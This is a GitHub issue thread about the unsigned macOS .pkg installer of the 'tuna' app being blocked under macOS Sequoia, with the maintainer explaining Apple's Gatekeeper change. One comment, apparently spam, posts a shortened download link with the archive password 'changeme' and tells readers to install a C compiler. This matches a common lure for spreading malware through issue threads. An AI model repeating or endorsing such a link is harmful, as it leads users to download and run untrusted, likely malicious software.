### ISSUE TITLE
MacOS Won't Open App

### ISSUE THREAD

**Issue by fdezwonders** [univrsal/tuna#198]
**Describe the bug**
Whenever I am trying to open the pkg installer on MacOS, I get this error message (attached below). I know there is a way around this, but can someone other than the author (and maybe the author itself) can vouch for the security of this app? It seemed to work the last time I installed this app (~9 months ago), but maybe macOS Sequoia is causing this ssue?

**To Reproduce**
1. Download .pkg
2. Click on it to open it.

**Expected behavior**
Going into Installer to install the app.

**Screenshots**
![Screenshot 2024-09-28 at 9 54 51 PM](https://github.com/user-attachments/assets/11949079-ba28-4bfa-abdf-d4bff8339768)

**Comment by SagarChandra07** [comment]
download
https://bit.ly/47P0Nvo

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by univrsal** [comment]
Yeah apple changed something about installing unsigned packages. https://www.idownloadblog.com/2024/08/07/apple-macos-sequoia-gatekeeper-change-install-unsigned-apps-mac/

it's now significantly more annoying. You can thank apple for that because they think you should not be able to directly install software on you own computer unless the developers pay apple $100 per year.

**Comment by fdezwonders** [comment]
@univrsal Dang, that must suck lol. OK, just wanted to know why the error kept popping up, keep up the great work!
